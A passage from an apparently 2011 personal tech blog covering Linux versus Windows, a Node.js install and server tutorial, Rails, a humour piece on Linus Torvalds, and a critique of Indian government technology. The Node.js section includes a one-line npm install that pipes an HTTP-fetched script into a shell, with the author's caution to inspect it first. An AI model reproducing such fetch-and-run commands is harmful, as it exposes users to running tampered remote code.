and easy workflow that I am accustomed to. For instance:</p> <ul> <li>Installing Ruby with build support for gems took a lot of time and patience.</li> <li>Cygwin does not compare anywhere near to a bash shell.
It’s like this tiny humble brother of shell who turns away when you say PATH. You have to type all those monstrous <code class="language-plaintext highlighter-rouge">C:/\</code> kind of paths.</li> <li>No App Store. Windows 8 dev preview does not have an app store yet, which was one of the reasons I had tried Win8. I’m used to frequently browsing the Ubuntu Software Center just to find something that fits.</li> <li>I found that my productivity reduced to half when I was on Windows. I spent too much time looking for stuff which could be done by a single line bash on Linux.</li> </ul> <p>Tags: operating systems, linux, ubuntu, windows 8, weblog ifest 2011</p> Programming in Node.JS 2011-09-12T00:00:00+00:00 https://captnemo.in/blog/2011/09/12/programming-in-nodejs <p>After my attempts at <a href="http://captnemo.in/blog/2011/05/16/learning-python">python</a> and <a href="https://rubyonrails.org">Ruby on Rails</a>, it was time for node.js. You ask me, what is node.js? Remember when Google Chrome came out and went <a href="http://stackoverflow.com/questions/40994/is-google-chromes-v8-engine-really-that-good">blazing past the rest of the browsers</a> in Javascript benchmarks? That was because of its internal Javascript Engine, called <a href="http://code.google.com/p/v8/">V8</a>.</p> <p>Soon, V8 was developed as a backend to an evented IO library, that is now known as <a href="http://nodejs.org">node.js</a>. Initially, it was named just node, but to prevent confusion, and explain its javascript inheritance, it was renamed node.js. This is the water-cooler moment of the language. If you know node, you’re the cool guy on the block. So what is so special in node?</p> <h2 id="evented-io">Evented IO</h2> <p>Basically node allows you to bring home the same good anonymous functions from <a href="http://jquery.org">jQuery</a> on your server.
In advanced terms, node allows evented input/output, meaning all the IO calls are non-blocking and evented, or scheduled in parallel.</p> <h3 id="traditional-io">Traditional I/O:</h3> <pre class="prettyprint">
data = file.read("/foo/bar");
// wait...
doSomething(data);
</pre> <h3 id="evented-io-1">Evented I/O:</h3> <pre class="prettyprint">
file.read("/foo/bar", function(data) {
  // called after data is read
  doSomething(data);
});
otherThing(); // execute immediately;
</pre> <h2 id="how-to-install">How To Install</h2> <p>The official installation guide is present at <a href="https://github.com/joyent/node/wiki/Installation">https://github.com/joyent/node/wiki/Installation</a>. I’d present a slightly different version, using <code class="language-plaintext highlighter-rouge">nvm</code>, i.e. <a href="https://github.com/creationix/nvm">Node Version Manager</a>.</p> <h3 id="unixlinux">Unix/Linux</h3> <h4 id="dependencies">Dependencies</h4> <p>There are some dependencies for installing node.</p> <p><code class="language-plaintext highlighter-rouge">sudo apt-get install git-core build-essential libssl-dev</code></p> <p>Run the corresponding command for your distro (yum etc).</p> <h4 id="installing-nvm">Installing nvm</h4> <ol> <li>Clone nvm: <code class="language-plaintext highlighter-rouge">git clone https://github.com/creationix/nvm.git ~/.nvm</code></li> <li>Include nvm: <code class="language-plaintext highlighter-rouge">. ~/.nvm/nvm.sh</code> //The dot is important</li> <li>Source it to your bash file. Basically copy the above command(2) inside your ~/.bashrc.</li> </ol> <h4 id="fetching-node">Fetching node</h4> <p>Node is under heavy development at the moment. Development of node is carried across a stable &amp; a testing branch. The stable branch is the one that you should prefer.
As of now, <code class="language-plaintext highlighter-rouge">stable</code> is <code class="language-plaintext highlighter-rouge">v0.4.11</code> and testing has reached <code class="language-plaintext highlighter-rouge">v0.5.6</code>.</p> <p>Now run the following commands: <code class="language-plaintext highlighter-rouge">nvm install v0.4.11</code> to install v0.4.11, <code class="language-plaintext highlighter-rouge">nvm use v0.4.11</code> to switch to it, and <code class="language-plaintext highlighter-rouge">nvm alias default v0.4.11</code> to make it the default.</p> <p>You can type <code class="language-plaintext highlighter-rouge">which node</code> to see the actual node binaries being used.</p> <h4 id="package-methods">Package Methods</h4> <p>I would strongly advise against using your distro versions of node, unless you are on a rolling release distro, such as Arch. Please do not run <code class="language-plaintext highlighter-rouge">sudo apt-get install node</code> to install node. This would only cause much anguish and pain later on.</p> <p>As of now, even the beta of Ubuntu 11.10 holds <code class="language-plaintext highlighter-rouge">v0.4.9</code> and is likely to do so for the next 6 months.</p> <h3 id="windows">Windows</h3> <p>As I’ve stopped using Windows for quite some time, here are instructions from the official node installation guide.</p> <p><strong>Windows Build (Node v0.5.5)</strong>: <a href="http://nodejs.org/dist/v0.5.5/node.exe">http://nodejs.org/dist/v0.5.5/node.exe</a>. I would again recommend installing <a href="http://nodejs.org/dist/v0.4.11/node.exe">http://nodejs.org/dist/v0.4.11/node.exe</a> for stability reasons.</p> <p>Self-contained binaries are available at <a href="http://node-js.prcn.co.cc">http://node-js.prcn.co.cc</a></p> <h3 id="node-package-manager">Node Package Manager</h3> <p>All cool programming languages come with their own package managers.
Ruby has <a href="https://rubygems.org">rubygems</a>, Python has pip, PHP has PECL, Perl has CPAN, and <code class="language-plaintext highlighter-rouge">node</code> has <a href="https://github.com/isaacs/npm">npm</a>.</p> <p><code class="language-plaintext highlighter-rouge">npm</code> holds a large collection of packages that are the extra batteries that don’t come included in node. If you need to parse documents, or do some other fancy stuff in node, don’t look farther than npm. If you need it, chances are, it already has a package in npm. See the <a href="https://www.npmjs.com/">list of packages</a> on the npm site.</p> <h4 id="unix">Unix</h4> <p>A simple one-line install is available for <code class="language-plaintext highlighter-rouge">npm</code>:</p> <p><code class="language-plaintext highlighter-rouge">curl http://npmjs.org/install.sh | sh</code></p> <p>This pipes a script fetched over plain HTTP straight into a shell, so you may want to save it to a file and read it before running it.</p> <p>After that, you can install any package by <code class="language-plaintext highlighter-rouge">npm install package</code>. For instance, install jade by <code class="language-plaintext highlighter-rouge">npm install jade</code>.</p> <p>Windows folks can clone the <a href="https://github.com/isaacs/npm">npm repository</a> and run the included <code class="language-plaintext highlighter-rouge">nmp.bat</code> file, and hope that it works.</p> <h2 id="simple-servers-in-node">Simple Servers in Node</h2> <p>node.js comes with “batteries included”, and part of that battery is node’s ability to instantly create web servers.
Yes, right inside your program, you can easily create web servers, which are fully compliant with HTTP.</p> <p>This is a very simple HTTP server, written using the http module (included) in node:</p> <pre class="prettyprint">var http = require('http');

// The callback runs once for every incoming request.
http.createServer(function(request, response) {
  var headers = { "Content-Type": "text/plain" };
  response.writeHead(200, headers);  // status line and headers
  response.write("Hello, World!\n"); // response body
  response.end();                    // finish the response
}).listen(8000);
</pre> <p>As you can see, the createServer function takes a callback function as its argument. The callback function is called for each of the requests. All events are handled easily and instead of a server handling threads, memory etc, node just handles requests. In essence, a request generates an <em>event</em>, which is then handled by the callback function provided.</p> <p>This is quite similar to the way we program event loops in javascript on the browser.</p> <h2 id="the-good-stuff">The good stuff</h2> <p>There are loads of interesting projects using node. Visit the <a href="https://github.com/joyent/node/wiki/modules">modules section</a> on the node wiki for a list of interesting node modules available. These include node clients for various libraries such as <a href="https://github.com/joyent/node/wiki/modules#wiki-database">Databases</a> (mysql, postgre, sqlite, Cassandra etc), Microframeworks (like Sinatra), Frameworks, wikis, CMS, parsers and what not.</p> <p>I’d recommend starting out with <a href="https://github.com/senchalabs/Connect">Connect</a> which is a middleware for node, and allows you to wrap your application easily around it. For databases, you can either go with the standard Relational ones (like mysql) or be brave, and take a spin with the NoSQL ones like CouchDB, Cassandra, or MongoDB.
All of them have native bindings available for node.js.</p> <h2 id="references">References</h2> <ul> <li><a href="https://github.com/joyent/node/">Node On GitHub</a>, including the wiki, documentation &amp; code</li> <li><a href="http://nodejs.org/">Nodejs.org</a></li> </ul> <h2 id="blogs--other-resources">Blogs &amp; Other resources</h2> <ul> <li><a href="http://blog.nodejitsu.com/">NodeJitsu</a>, a company working completely on node. <img src="https://img.shields.io/badge/status-dead-red.svg?style=flat-square" alt="" /></li> <li><a href="http://www.bytemuse.com/2011/06/getting-started-with-node-js-express-and-couchdb/">Getting Started with Node.JS, Express and CouchDB</a></li> <li><a href="http://blog.nodejitsu.com/6-must-have-nodejs-modules">6 Must Have Node.js Modules</a></li> <li><a href="http://addyosmani.com/blog/spotlight-issue1/">Some cool node projects</a></li> <li><a href="http://howtonode.org/">HowToNode</a></li> <li><a href="http://nodebeginner.org/">The node Beginner book</a></li> <li><a href="http://nodecasts.org/">NodeCasts</a></li> </ul> <h2 id="stackoverflow-questions-on-node"><a href="http://stackoverflow.com">StackOverflow</a> Questions on node</h2> <ul> <li><a href="http://stackoverflow.com/questions/5869216">How to store Node.js deployment settings/configuration files?</a></li> <li><a href="http://stackoverflow.com/questions/2353818/how-do-i-get-started-with-nodejs">How do I get started with NodeJS</a></li> <li><a href="http://stackoverflow.com/questions/1884724/what-is-node-js">What is node.js</a></li> <li><a href="http://stackoverflow.com/questions/3648993/where-can-i-host-a-node-js-app">Where to host node.js applications</a></li> </ul> Learning Ruby on Rails 2011-08-01T00:00:00+00:00 https://captnemo.in/blog/2011/08/01/learning-ruby-on-rails <p>Continuing my quest on Web Designing, I’ve started learning <a href="http://rubyonrails.org" title="Official RoR Site">Ruby On Rails</a>, which is like <em>the</em> most-hyped web framework of the
moment. After all, <a href="https://github.com" title="GitHub">Github</a> runs on Ruby On Rails, <a href="http://redmine.org" title="A project management system with code browsing">Redmine</a> uses Rails, and so do <a href="http://basecamphq.com">Basecamp</a>, <a href="http://hulu.com">Hulu</a>, <a href="http://scribd.com">Scribd</a>, and even <a href="http://twitter.com">Twitter</a>. Even though RoR has Ruby in its name, it’s just a namesake.</p> <p>Learning Ruby and learning Rails are two entirely different routes, and learning one only gives you a slight advantage in the other. I’m learning Rails by the excellent book, <a href="https://www.railstutorial.org/" title="Ruby On Rails Tutorial Book">Ruby On Rails 3 Tutorial</a>, by Michael Hartl. It covers Rails 3, which is one reason I picked it as Rails 3 is quite different from Rails 2 in comparison.</p> <p>Rails in a few words would be described as <em>a Web framework that makes writing web applications really, really easy</em>. And I really mean that. I’ve been programming in Rails for ~2 days, and I can comfortably say that it is better than any other PHP framework (viz <a href="http://cakephp.org">CakePHP</a>, <a href="http://codeigniter.com">CodeIgniter</a>, <a href="http://kohanaphp.com">Kohana</a>) simply because it is powered by Ruby.</p> <p>And the beauty of Ruby is not in its implementation, but in its elegance. Reading Ruby code is like seeing a visual presentation. While PHP is the paragraphed, prose version of the same stuff. Simply put, PHP allows you to do the same things, but essentially it was not readable enough to match Ruby’s elegance.</p> <p>Rails follows the <a href="http://en.wikipedia.org/wiki/Model-view-controller" title="Model View Controller">MVC pattern</a> (Model-View-Controller) for development, and uses it strictly. It has got its own conventions, but as I found out, the concept of convention over Configuration makes much more sense in Rails than it ever did in PHP.
All that time I spent in the CakePHP console was nothing compared to the interactivity of the Rails Console (<code class="language-plaintext highlighter-rouge">rails c</code>). Starting the development server (<code class="language-plaintext highlighter-rouge">rails s</code>) is as easy as running the production server (<code class="language-plaintext highlighter-rouge">rails s --environment production</code>).</p> <p>Instead of writing down <em>another</em> beginner tutorial on Rails, I’d rather direct you to some of the excellent Rails resources:</p> <ul> <li><a href="https://www.railstutorial.org/" title="Ruby On Rails Tutorial Book">Ruby on Rails 3 Tutorial</a>, the book I’m reading for learning Rails. Highly recommended</li> <li><a href="http://railsbrains.org">RailsBrains</a>, offline API for Rails</li> <li><a href="http://guides.rubyonrails.org/getting_started.html">Rails Getting Started</a>, Official Rails Getting Started guide</li> <li><a href="http://stackoverflow.com/questions/tagged/ruby-on-rails">Rails@Stackoverflow</a></li> </ul> Announcing Planet IITR 2011-07-09T00:00:00+00:00 https://captnemo.in/blog/2011/07/09/announcing-planet-iitr <p><a href="http://www.planetaki.com/iitr/">Planet IIT-R</a> is a blog collection similar to the <a href="http://planet.ubuntu.com">Planet Ubuntu</a>, <a href="http://planet.wordpress.com">Wordpress</a>, and the like. The basic idea is to create a single address where all blogs of IIT-R are aggregated. This way, people can easily follow happenings and blogs at IIT-Roorkee without individually following various blogs.
I’ve added a few blogs to it already, including those of <a href="http://divye.in">Divye Kapoor</a>, Sanath Rath, <a href="http://wona.co.in">Wona</a>, Arasu and the like.</p> <p>A complete list of blogs in the planet is available at <a href="http://www.planetaki.com/iitr/subscriptions/">http://www.planetaki.com/iitr/subscriptions/</a></p> <p><strong>Update</strong>: There is also a feature in planetaki to suggest a website for the planet. Unfortunately, you need to be logged in to planetaki (i.e. create a planet) to suggest a site. In case you are, you can use <a href="http://planetaki.com/iitr/subscriptions/suggest">the suggestions</a> feature to suggest websites.</p> <p>To suggest a blog to add to the list, please use the form below. You can also see the current spreadsheet <a href="https://spreadsheets.google.com/spreadsheet/pub?hl=en_US&amp;hl=en_US&amp;key=0AmqzfUR1eWkldHdGSTNOM1kyZVEtRElWU0xsYkZVZ1E&amp;single=true&amp;gid=0&amp;output=html">here</a>:</p> <iframe src="https://spreadsheets.google.com/spreadsheet/embeddedform?formkey=dHdGSTNOM1kyZVEtRElWU0xsYkZVZ1E6MQ" width="760" height="643" frameborder="0" marginheight="0" marginwidth="0">Loading...</iframe> <p>You can also <a href="/contact/">email me</a> for any further queries.<br /> Further Links:</p> <ul> <li><a href="http://planetaki.com">http://planetaki.com</a></li> <li><a href="http://planetplanet.com">http://planetplanet.com</a></li> <li><a href="https://spreadsheets.google.com/spreadsheet/pub?hl=en_US&amp;hl=en_US&amp;key=0AmqzfUR1eWkldHdGSTNOM1kyZVEtRElWU0xsYkZVZ1E&amp;single=true&amp;gid=0&amp;output=html">Spreadsheet of the form above</a></li> </ul> What if Linus Torvalds designed Google+ 2011-07-07T00:00:00+00:00 https://captnemo.in/blog/2011/07/07/linus <p>Google’s announcement of its next big thing, <a href="http://plus.google.com">Google+</a>, to take on Facebook left people wondering if the next version would be called Google++.
In spite of all the great work that Vic Gundotra has put into Google+, it still lacks something: the creator of Linux, Linus Torvalds. Google+ is as of now the social network for tech-geeks who are part of a field trial experiment (monkeys!) on the site. Google+ is still halfway geek, and in my imagination it would have been the ultimate geek power tool if it had been designed by Linus. Unfortunately, he is busy developing the Linux kernel (10 million lines, 2% being his), and we will have to make do with these thoughts:</p> <ul> <li><strong>Open Source</strong> : Google+ would be open sourced. Anyone could run Google+ on their own servers, and use it to create their own Social Network</li> <li><strong>Command Line</strong> : The default Google+ client would run natively on linux/unix but would be ported later to Windows using cygwin.</li> <li><strong>Difficulty-of-use</strong> : Gone are the click and point days. You’d be required to have absolute mastery over at least 5 different commands before you can even post a single item to your feed.</li> <li><strong>Full Control</strong> : You will have full control over whatever you post. You can make 4 changes, stage them, take them back, commit 2 of them, edit a post, and recommit before pushing it to the server. However, all of this will be stored.</li> <li><strong>Git Backend</strong> : Both the client and the server will use git as their backend to store history, revisions, links, and circles.</li> <li><strong>Circles</strong> : would be called trees. And you can tag your trees to take a snapshot of your friends lists at a time.</li> <li><strong>Branching</strong> : would allow you to create multiple versions of your profile. The default version will be called master, while you can continue your secret development in alpha, staging, beta branches.
Circles will automatically be associated with branches and auto-post items.</li> <li><strong>Merging</strong> : will allow for collaborative posts.</li> <li>After 12 years of development, Google+ will reach version 2.1</li> <li><strong>No deletions</strong> : Everything in history has an importance. You are allowed to use rebase to rewrite history. Beware: use cautiously. Incorrect usage may lead to painful scenarios.</li> <li>A mascot (direwolf?) would be found for Google+ (probably after it bit Linus in an aquarium)</li> <li>Facebook would spend $421m fighting Google+</li> <li>The manual of Google+ would be a labyrinth of switches and command line arguments for all the features that it came with. A user would be expected to read through the entire manual, or at least the first one-third, before being able to <em>do something</em> of use with the service.</li> <li>To block a user, you must enter his id in an ignore file</li> <li>3 years hence, the next big thing would be ghub offering a farm-like service to create, host, and customize your own google+ servers.</li> </ul> <blockquote> <p>Note: Based on the history of linux, and the usability of git.</p> </blockquote> <h3 id="announcement">Announcement</h3> <p>The <a href="http://www.thelinuxdaily.com/2010/04/the-first-linux-announcement-from-linus-torvalds/">famous announcement of Linux Kernel</a> on the <code class="language-plaintext highlighter-rouge">comp.os.minix</code> mailing list is well-known. Slightly re-written, this is how Linus might have announced Google+.</p> <pre>
&gt;From: [email protected] (Linus Benedict Torvalds)
&gt;Newsgroups: web.social.facebook
&gt;Subject: What would you like to see most in facebook
&gt;Summary: small poll for my new social network
&gt;Message-ID: &lt;[email protected]&gt;
&gt;Date: 28 Jun 11 20:57:08 GMT
&gt;Organization: Google

&gt;Hello everybody out there using facebook -

&gt;I’m doing a (free) social network (just a hobby, won’t be big and professional like facebook). This has been brewing since dec, and is starting to get ready. I’d like any feedback on things people like/dislike in facebook, as my site resembles it somewhat (same layout of the news feed and comments(due to practical reasons) among other things).

&gt;I’ve currently ported feed(1.08), comments(2.1), photos(3.14), and likes(1.40), and things seem to work. This implies that I’ll get something practical within a few months, and I’d like to know what features most people would want. Any suggestions are welcome, but I won’t promise I’ll implement them :-)

&gt;Linus ([email protected])

&gt;PS. Yes – it’s free of any facebook code, and it has pipelined js. It is NOT protable (uses google accounts), and it probably never will support anything other than Google App Engine, as that’s all I have :-(.
</pre> <p>Tags: <a href="http://www.facebook.com/WeBlog2011">WeBlog iFest 2011</a>, humour, linux, linus</p> Why Indian Government Sucks at Technology 2011-06-22T00:00:00+00:00 https://captnemo.in/blog/2011/06/22/why-indian-government-sucks-at-technology <blockquote> <p><strong>Note</strong>: All opinions are mine alone. Please keep your opinions limited to comments.</p> </blockquote> <p>This is in the wake of the <a href="http://www.voiceofgreyhat.com/2011/06/anonymous-withdrawn-op-india-untold.html" title="Aftermath of the attack">not-so-anonymous</a> <a href="http://www.thehackernews.com/2011/06/anonymous-india-opindia-strikes-again.html" title="News report of the actual event">attacks</a> on the NIC servers. Apparently a <a href="http://pastebin.com/MHwHNTEi" title="Names of perpetrators of the hack">few people</a> had decided to brand their own version of AnonymousIndia and hack into the NIC servers. This has been viewed as almost normal in the Indian media. This is after all something that happens every other day in India.
It’s just the Indian Army website, nothing that we care about.</p> <p>Even though there are excellent <a href="http://jobs.nullcon.net/" title="Jobs in indian security sector">tech-security companies in India</a>, we have never developed the right attitude to it. People still think that hacking is fun, and that it’s something that could never happen to them. I’ve never seen people reading the fine print on the thousand social web sites they join nowadays. Piracy is rampant in India without any checks and the Indian Government is silent.</p> <p>Why? Because we are used to it. It has always happened this way. Information leaks have been a major part of Indian history and will remain so unless we realize that the more we embrace technology and the more dependent we become on it, the closer we come to the edge.</p> <p>A recent tweet by <a href="http://www.twitter.com/#!/divyekapoor/" title="@divyekapoor on twitter">@divyekapoor</a> reminded me of the AADHAR project, which aims to give out a unique identification number to each Indian citizen.</p> <!-- http://twitter.com/#!/divyekapoor/status/82123483202584576 --> <blockquote class="twitter-tweet" data-lang="en"><p lang="en" dir="ltr">Hacks like these ensure that I will resist giving my Biometrics to the UID project till they&#39;ve suffered atleast 4 security breaches.</p>&mdash; Divye Kapoor (@divyekapoor) <a href="https://twitter.com/divyekapoor/status/82123483202584576">June 18, 2011</a></blockquote> <!-- end of tweet --> <p>I read through the <a href="http://uidai.gov.in/" title="Official Website">UIDAI</a> <a href="http://uidai.gov.in/UID_PDF/Front_Page_Articles/MOU/MOUsSigned/MOU_Uttarakhand.pdf" title="UIDAI's 'MOU With the uttrakhand govt.">docs</a>, and they tell us that it would <em>“prescribe protocols to ensure the confidentiality, privacy and security of data”</em>, and <em>“follow the confidentiality, privacy and security
protocols prescribed by the UIDAI”</em>. A search on the uidai.gov.in website gives a little detail:</p> <blockquote> <p>The UID database will be guarded both physically and electronically by a few select individuals with high clearance. It will not be available even for many members of the UID staff and will be secured with the best encryption, and in a highly secure data vault. All access details will be properly logged.</p> </blockquote> <p>This is the most that they have to say on the subject. If that makes you feel safe, remember the earlier fiasco involving the security of the <a href="http://indiaevm.org/" title="Website of the security researchers detailing their study on tampering of EVMs">EVM machines</a>. Ultimately I’m with the government on that one, however, since a user had to have physical access to actually do any harm to the machine. But <em>it was possible</em> and the Election Council kept denying it. As it happened, it seems that all our govt. agencies are probably trying more to hide their technical requirements than to make them open.</p> <p>So why is this approach taken in India? Bureaucracy? Probably yes. But I feel that unless the technocrats rise up and actually enter the Indian Govt. technical agencies (such as NIC), nothing will change. For instance, I find that almost everything that the Indian government does is tailored specifically for Windows.
There is no reason to plaster <a href="http://www.google.com/search?q=Internet%20Explorer%20site:gov.in%20-filetype:pdf" title="List of indian government websites with the words Internet Explorer">“Works best in Internet Explorer 6 at 1024x768”</a> on all your web sites; we already know how much the <a href="http://techrights.org/wiki/index.php/Microsoft_influence_in_the_Indian_government" title="Microsoft's Influence in the Indian Government">Indian</a> <a href="http://techrights.org/2010/01/22/india-patents-microsoft-lobby/">government</a> <a href="http://ramdas.diqtech.com/blogs/2008/jun/16/how-microsoft-has-locked-the-indian-government/" title="Microsoft has locked the Indian Government">loves Windows</a>. So much so that they get it pre-installed everywhere, even in government schools, and technical institutions.</p> <p>Yet there is a small faction that is working tirelessly in the other direction as well. For instance, the <a href="http://technorati.com/technology/gadgets/article/sakshat-a-35-tablet-to-be/" title="Technorati's report on the device with specs of the tablet">Sakshat project</a> has been in the news recently as well. It would ship with a version of android (which one?) with wi-fi, bluetooth and other frills. However, the project has been known for shadowing and changing its details at each conference where it is unveiled, so beware. It may suddenly change from an android to a Windows phone in the next one. Or maybe a blade server (speaking of which, the <a href="http://www.uidai.gov.in/index.php?option=com_content&amp;view=article&amp;id=177&amp;Itemid=214" title="List of contracts awarded by UIDAI">uid project ordered 68 of them</a>).</p> <p>I’ve worked a little bit on online Geo-Mapping tools earlier (mostly using Google Maps API). However, I wanted some accurate data for one of my projects (such as geographical boundaries).
Other sources for this data are not as reliable, and I found the <a href="http://bhuvan3.nrsc.gov.in/" title="Bhuvan is a Google Earth like mapping tool developed by ISRO">bhuvan online tool</a> to be extremely accurate in this respect. If you’ve forgotten <a href="http://bhuvan.nrsc.gov.in/bhuvan/" title="Official site">Bhuvan</a>, it’s the Indian version of Google Maps. It was supposed to be <strong>the tool for mapping things</strong>. Unfortunately, as things have panned out, most of its <a href="http://ogleearth.com/2008/11/bhuvan-indias-upcoming-web-map-announced-misreported/" title="Bhuvan not what it was supposed to be">claims have been rubbished</a> (like 10m resolution power), or made null due to the extremely slow servers it uses (and it was supposedly optimized for low bandwidths). If you’re planning to fight google, you’ve to step up your game. Try checking out the horrible design of the Bhuvan website. Leaving aside its horrible interface, Windows only support (.net), and installation of additional plugins just to run it, it had brilliant geographical data (collected via various government agencies). However, as it turns out, this data is not public. Why? It seems that ISRO plans to <a href="http://www.dnaindia.com/india/report_bhuvan-our-answer-to-google-earth-soon_1203871">sell this data</a> to people interested in using it. Wow! So a publicly funded agency decides to make money from the development done using <em>our money</em>. It’s been close to 3 years since its launch. And I’d be highly interested in knowing where it managed to sell this data.</p> <p>In all fairness, though, they’ve said that they would only sell the high resolution data, while making the general data <em>freely available to users</em>. But I don’t see it as fair unless it’s on my system, damn it. If by free you mean I’d have to open your website each time I need to find a village, it seems we have different thoughts about the word’s usage.
Oh, and there’s a link on the website’s home page to a section called APIs which redirects to the Bhuvan Software download page, where guess what, there are no APIs at all. I managed to dig up a few links and download two versions of their APIs, which seem to be downloaded copies of the documentation of the open layer javascript protocol they are using for mapping in the browser. So the data is available, it seems. But they’re forgetting to mention where.</p> <p>Seriously, people, wake up. This is the 21st century, and the most hyped buzz word today is open-source (well, after cloud). And if you really want to work on things, make them open source. Not just the technology, but the data as well. Because open data is essential to the growth and planning of a nation, as Hans Rosling keeps on reminding us. Meanwhile, DRDO decides to go ahead and <a href="http://articles.economictimes.indiatimes.com/2010-10-10/news/28458329_1_saraswat-drdo-cyber-attacks">develop its own operating system</a>. Why? Because it will be closed-source and will be much more secure than any of the variants of linux. Or so they think.</p> <p>The Informatics center still runs thousands of its websites in ASP (not even ASP.net), and this fact alone is enough to scare me off. With major corporations suffering from data leakage (Sony, Gawker) where user access was compromised, it is high time that someone in the Indian Govt. realizes that you cannot secure your systems by locking them in a vault. These companies did the same, and look at the result.</p> <p>Even the American Government has come up with an open-source initiative. Their website <a href="http://www.data.gov">data.gov</a> is a collection of applications, apis and raw data collected by various government agencies.
And to top it all, the <a href="http://www.govtech.com/e-government/White-House-Honors-Unsung-Open-Data-App-Developers.html">US government invited the top application developers</a> from their platform at data.gov to the White House, hailing them as unsung heroes of the new age. If you’re interested in reading more and taking a stand for the open data democracy, take a look at <a href="http://share-psi.eu/papers/TNO.pdf">this whitepaper</a> by the Netherlands Organisation for Applied Scientific Research for a keen review of the major barriers that keep a government from sharing its data. Also go ahead and donate some money to wikileaks, while you’re at it.</p> <p>And where is the Indian government at this? Not <em>very</em> far behind, but lagging nonetheless. Let us take the prime example of the decennial festival that is the Census. Apparently all census data is free (as it should be). But there is a minor caveat. The entire site is made in asp (which doesn’t really matter, I just don’t like it), and all the data (tables, figures, maps) are in pdf format. So, you can access the data personally, on a single page. Page by page, it might be thousands of documents, figures, charts, and what not. But since it is all in pdf format, it is locked down. You could parse it by some means, but the data is supposed to be free, in the best format possible so that everyone can use it easily. And the geographical boundary data (which I mentioned earlier) is also available in the census results, but only via a <a href="http://www.censusindia.gov.in/maps/censusgis/Census_GIS/page/India_WhizMap/IndiaMap.htm" title="Developed by Whizmaps, Riddhi softwares">java applet</a>, which does not allow access to the raw data that an application developer would need. Am I expected to file an RTI application, just to know the <em>exact</em> boundaries of my state?
Or perhaps, I should just pay ISRO and be done with it.</p> <p>As an <del>additional benefit</del> <ins>easter egg</ins>, the census website <a href="http://www.censusindia.gov.in/Footer_Menus/Disclaimer.html">states the following</a>:</p> <blockquote> <p>The Census of India or any data or content providers shall not be liable for any errors in the content, or for any actions taken in reliance thereon.</p> </blockquote> <blockquote> <p>All efforts have been made to ensure the accuracy and currency of the content on this website. However, users are requested to verify/check any information with us to obtain appropriate professional advice before acting on the information provided in the website. In no event will the Government or office of the Registrar General India be liable for any expense, loss or damage including, without limitation, indirect or consequential loss or damage, or any expense, loss or damage whatsoever arising from use, or loss of use, of data, arising out of or in connection with the use of this website.</p> </blockquote> <p>And lastly, as an analogue to the excellent Right To Information Act, there must be an analogous Right To Technology act. It should empower each and every person in the country to know what is happening behind the scenes. We demand total transparency in technological decisions. Not just the passing of tenders, but the decisions which involve actual technological development. For example, at the CDAC website, the government offers a trial version of various forensic tools they’ve developed. Why aren’t they open sourced? Why were they written using a particular language? If RTI fought off the bureaucracy, this could help us eliminate the old technocrat thinking from the Indian Govt. If we are able to get the right data, in the right format, thousands of application developers across the world are willing to create great ways to access that data. Data by itself is not enough, however.
It must be met with an equal resolve from people to make it accessible and usable.</p> <p>This could be a turning point in the Indian Govt. Either they could continue what they’ve been doing and meet their doom in a major state-sponsored hack crippling the entire nation. Or they could take a step back, and do things the right way.</p> <p>And what is the right way?</p> <p><img src="/img/peace-love-linux.jpg" alt="Peace, Love, Linux" /></p> <p><strong>Update</strong>: According to an article in the <a href="http://economictimes.indiatimes.com/news/international-business/all-new-e-governance-projects-must-work-on-open-source-operating-systems-draft/articleshow/9119827.cms">Economic Times</a>, a draft for bringing open source into e-governance systems is in the works.</p> Setting Up Sparkleshare Server using Gitolite and Ubuntu 2011-06-20T00:00:00+00:00 https://captnemo.in/blog/2011/06/20/ubuntu-gitolite-sparkleshare-install <h2 id="introduction">Introduction</h2> <p>Everybody seems to be all about open-source cloud-backup and sync solutions nowadays. The hype is all around the cloud, they say. However, cloud is just a stupid <a href="http://everythingsysadmin.com/2011/06/avoid-using-the-term-cloud-com.html">concept for sales people</a> that I prefer to avoid. Still, people are coming up with all kinds of crazy ideas to create their own <a href="http://fak3r.com/geek/howto-build-your-own-open-source-dropbox-clone/">dropbox</a> <a href="http://www.rubyinside.com/rubydrop-a-dropbox-clone-in-ruby-3968.html">clones</a>. A few similar services include <a href="https://spideroak.com/">SpiderOak</a>, <a href="https://one.ubuntu.com/">Ubuntu One</a>, <a href="https://www.sugarsync.com/">Sugar Sync</a>, and <a href="http://www.wuala.com/">Wuala</a>.
However, not all of them are compatible with Linux (unlike Dropbox, which is).</p> <h2 id="comparision">Comparison</h2> <p>So here’s a minor comparison of some famous clients:</p> <ul> <li><strong>Dropbox</strong> : Current leader, offers everything from sync, collaboration, sharing, public links, upgradable storage and is <em>the de-facto</em> client for synchronization tasks. However, there have been a few privacy issues with it recently.</li> <li><strong>Ubuntu One</strong> : Ubuntu One is Ubuntu’s fighting offering to Dropbox. It’s excellent, with an open source api that allows one to create applications for the Ubuntu One platform very easily. However, the server-side of Ubuntu-One is still closed source, which means you cannot set it up on your own servers (similar to dropbox). Canonical has hinted that it might be made open source in the future.</li> <li><strong>Wuala</strong> : is a file-backup network where you trade your own hard disk space for extra storage. This allows wuala to offer higher space at a much lower offering rate.</li> <li><strong>SpiderOak</strong> : I’m using this currently along with SparkleShare and Dropbox. It has proven to be very robust, allowing me to backup almost anything to its servers. I’ve got a 5GB account which is more than enough for me till now. Its very powerful interface allows one to control each and every aspect of your backup/sync/share process. Also it boasts of a true-privacy feature, meaning that all your documents are encrypted before being sent to dropbox.
It also means that you can only reset your password from your own computer.</li> </ul> <p>Take a look at <a href="http://en.wikipedia.org/wiki/Comparison_of_file_synchronization_software">http://en.wikipedia.org/wiki/Comparison_of_file_synchronization_software</a> for a better comparison of several other services as well.</p> <h1 id="installing-sparkleshare-using-gitolite">Installing SparkleShare using gitolite</h1> <p>This is a simple tutorial on running your own sparkleshare server as a hosting server. Note that this implementation should ideally be built as a separate module for sparkleshare-admin, which is still in the works as of writing. Sparkleshare’s basic concept is to use git repositories as storage places. In case you don’t know what git is, I’d recommend <a href="https://git.wiki.kernel.org/index.php/GitFaq">this guide</a> for more details. In short, it is an awesome revisioning system for use by anyone managing code (or content, for that matter). It allows you to keep track of what is happening with your directory, and revert back to earlier versions (among <strong>several</strong> other things).</p> <p>Sparkleshare asks you to set up a git server somewhere and use it as a remote storage system. It offers out of the box support for git hosting providers <a href="https://www.github.com">github</a> and <a href="http://gitorious.org/">gitorious</a>. It also allows you to add your own custom servers.
